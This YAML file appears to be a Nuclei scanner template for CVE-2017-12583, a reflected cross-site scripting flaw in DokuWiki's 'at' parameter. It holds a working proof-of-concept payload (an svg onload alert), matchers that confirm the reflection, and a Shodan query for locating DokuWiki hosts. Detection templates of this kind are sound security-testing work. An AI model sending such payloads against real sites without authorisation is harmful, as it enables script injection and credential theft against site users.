42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: CVE-2017-12583
|
|
|
|
info:
|
|
name: DokuWiki - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://github.com/splitbrain/dokuwiki/issues/2061
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12583
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-12583
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
shodan-query: http.title:"DokuWiki"
|
|
tags: cve,cve2017,xss,dokuwiki
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/08/12
|